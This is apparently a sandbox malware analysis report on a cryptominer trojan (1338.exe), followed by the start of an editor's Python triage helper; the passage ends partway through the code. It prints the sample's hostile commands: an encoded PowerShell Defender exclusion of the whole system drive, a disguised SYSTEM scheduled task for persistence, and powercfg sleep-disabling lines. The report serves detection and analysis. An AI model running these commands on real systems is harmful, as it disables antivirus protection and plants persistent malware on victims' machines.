                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "ossgiopsxzJump to behavior
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
                    Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%vsacxjoagfdpyf%'
                    Source: C:\Windows\System32\conhost.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_luxykyrv.0d4.ps1
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.mine.winEXE@52/13@0/0
                    Source: C:\Windows\System32\conhost.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Windows\System32\conhost.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3396:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2812:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5952:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4452:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | File created: C:\Program Files\Google\Chrome\updater.exe
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: 1338.exe | Static file information: File size 1951744 > 1048576
                    Source: C:\Windows\System32\conhost.exe | Directory created: C:\Program Files\Google\Chrome\updater.exe
                    Source: C:\Windows\System32\conhost.exe | Directory created: C:\Program Files\Google\Libs
                    Source: C:\Windows\System32\conhost.exe | Directory created: C:\Program Files\Google\Telemetry
                    Source: 1338.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1dac00
                    Source: Binary string: H:\CRYPTOCOIN\Mandark-master\obj\x64\Release\ClassLibrary.pdb source: conhost.exe, 00000018.00000002.674440898.0000027E779F0000.00000004.08000000.00040000.00000000.sdmp

                    Data Obfuscation

                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Google\Chrome\updater.exe^"'
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Google\Chrome\updater.exe^"'Jump to behavior
                    Source: C:\Users\user\Desktop\1338.exe | Code function: 0_2_005DD44E push rsp; iretd 0_2_005DD44F
                    Source: C:\Users\user\Desktop\1338.exe | Code function: 0_2_005DDAC0 push rax; retf 0009h 0_2_005DDAC1
                    Source: C:\Users\user\Desktop\1338.exe | Code function: 0_2_005DD900 push rax; ret 0_2_005DD901
                    Source: C:\Users\user\Desktop\1338.exe | Code function: 0_2_005DDB00 push rax; retf 0_2_005DDB01
                    Source: C:\Users\user\Desktop\1338.exe | Code function: 0_2_005DDC00 push rax; iretd 0_2_005DDC01
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF9F1B509C2 push cs; ret 4_2_00007FF9F1B50BFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF9F1B54FFD push eax; iretd 4_2_00007FF9F1B550A1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF9F1B57317 push ebx; iretd 4_2_00007FF9F1B5731A
                    Source: C:\Windows\System32\conhost.exe | Code function: 24_2_00007FF9F1C079BB push esi; retf 24_2_00007FF9F1C079BC
                    Source: C:\Windows\System32\conhost.exe | Code function: 37_2_00409AC0 push rax; retf 0009h 37_2_00409AC1
                    Source: C:\Windows\System32\conhost.exe | Code function: 37_2_0040944E push rsp; iretd 37_2_0040944F
                    Source: C:\Windows\System32\conhost.exe | Code function: 37_2_00409900 push rax; ret 37_2_00409901
                    Source: C:\Windows\System32\conhost.exe | Code function: 37_2_00409B00 push rax; retf 37_2_00409B01
                    Source: C:\Windows\System32\conhost.exe | Code function: 37_2_00409C00 push rax; iretd 37_2_00409C01

                    Persistence and Installation Behavior

                    Source: C:\Windows\System32\conhost.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    Source: C:\Windows\System32\conhost.exe | File created: C:\Program Files\Google\Chrome\updater.exe

                    Boot Survival

                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Google\Chrome\updater.exe"'
                    Source: C:\Windows\System32\conhost.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                     Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX (27 identical entries)
                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (110 identical entries)
                     Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX (21 identical entries)
                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6068 Thread sleep count: 6924 > 30
                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5416 Thread sleep count: 1590 > 30
                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3596 Thread sleep time: -11068046444225724s >= -30000s
                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6460 Thread sleep count: 5990 > 30
                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6456 Thread sleep count: 1915 > 30
                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4628 Thread sleep time: -2767011611056431s >= -30000s
                     Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (4 identical entries)
                     Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 922337203685477 (2 identical entries)
                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 identical entries)
                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6924
                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1590
                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5990
                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1915
                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                     Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 922337203685477 (2 identical entries)
                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 identical entries)
                    Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 35000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\1338.exe | Memory written: C:\Windows\System32\conhost.exe base: 2779DCB0000
                    Source: C:\Program Files\Google\Chrome\updater.exe | Memory written: C:\Windows\System32\conhost.exe base: 27E76320000
                    Source: C:\Windows\System32\cmd.exe | Process created: Base64 decoded: <#mo#> Add-MpPreference <#sun#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#pwkq#> -Force <#ikyu#> (4 identical entries)
                    Note: the <#...#> tokens are empty PowerShell block comments inserted as padding, so the effective command is Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, which excludes the whole user profile and the entire system drive from Microsoft Defender scanning.
                    Source: C:\Users\user\Desktop\1338.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 2779DCB0000 protect: page execute and read and write
                    Source: C:\Program Files\Google\Chrome\updater.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 27E76320000 protect: page execute and read and write
                    Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 400000 value starts with: 4D5A (the "MZ" PE header)
                    Source: C:\Windows\System32\conhost.exe | Thread register set: target process: 6712
                    Source: C:\Users\user\Desktop\1338.exe | Thread created: C:\Windows\System32\conhost.exe EIP: 9DCB0000
                    Source: C:\Program Files\Google\Chrome\updater.exe | Thread created: C:\Windows\System32\conhost.exe EIP: 76320000
                    Note: 1338.exe (and later the dropped updater.exe) allocates an RWX region in a freshly started conhost.exe, writes to it and starts a thread there; the injected conhost.exe in turn writes a PE image at 0x400000 of another conhost.exe and sets that thread's context. This is why conhost.exe, which normally has no children, appears below as the parent of the cmd.exe / powershell.exe / powercfg.exe / schtasks.exe chain.
                    Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A" (6 identical entries)
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A" (6 identical entries)
                    Source: C:\Users\user\Desktop\1338.exe | Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\1338.exe"
                    Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 (2 identical entries)
                    Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Google\Chrome\updater.exe^"'
                    Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0 (2 identical entries)
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0 (2 identical entries)
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0 (2 identical entries)
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0 (2 identical entries)
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Google\Chrome\updater.exe"'
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /run /tn "GoogleUpdateTaskMachineQC"
                    Source: C:\Program Files\Google\Chrome\updater.exe | Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"
                    Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
                    Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "ossgiopsxz"
                    Source: conhost.exe, 00000001.00000000.433112661.000002779E7A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                    Source: conhost.exe, 00000001.00000000.433112661.000002779E7A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                    Source: conhost.exe, 00000001.00000000.433112661.000002779E7A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: YProgram Managerf
                    Source: conhost.exe, 00000001.00000000.433112661.000002779E7A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\conhost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                    (Duplicate entries collapsed: every powershell.exe query above is listed several times in the report, once per process instance that issued it.)

                    Lowering of HIPS / PFW / Operating System Security Settings

                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0 (4 identical entries)
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0 (4 identical entries)
                    Note: powercfg /x is the legacy alias of /change, and a timeout of 0 means "never"; with these settings the host no longer sleeps or hibernates on mains power, so the miner keeps running. The full chain shown earlier also zeroes the -dc (battery) timeouts.
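                    The process-creation evidence above (the encoded Add-MpPreference command, the powercfg timeout changes, the SYSTEM scheduled task and conhost.exe acting as a parent) is the part of this report most worth turning into a repeatable check. The script below is an added example by the editor, not part of the Joe Sandbox report or of the sample: it decodes PowerShell -EncodedCommand blobs, strips the <#...#> comment padding, and classifies (parent image, command line) pairs the way a triage analyst would. The sample events are constructed from the command lines in this report; the heuristics (conhost.exe should have no children, exclusions of $env:SystemDrive or $env:UserProfile, powercfg timeouts of 0, tasks created with /ru System, GoogleUpdateTaskMachine* naming) are the editor's assumptions about what to flag, not signatures from the report.

```python
"""Added triage helper (editor's example, not part of the Joe Sandbox report):
decode PowerShell -EncodedCommand blobs and flag the behaviours this report records."""
import base64
import re

# -EncodedCommand and its common short forms (-e, -ec, -enc) followed by a base64 blob.
_ENC_RE = re.compile(r'-e(?:nc(?:odedcommand)?|c)?\s+"?([A-Za-z0-9+/=]{16,})', re.IGNORECASE)
# PowerShell block comments; the sample uses empty <#xx#> comments as junk padding.
_COMMENT_RE = re.compile(r"<#.*?#>", re.DOTALL)

# The encoded blob exactly as it appears in this report.
ENC = "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A"

# Constructed sample events (parent image, child command line). The command lines are
# copied from this report and paired with the parents the report's process tree shows.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\conhost.exe",
     '"C:\\Windows\\System32\\cmd.exe" cmd /c powershell -EncodedCommand "' + ENC + '"'),
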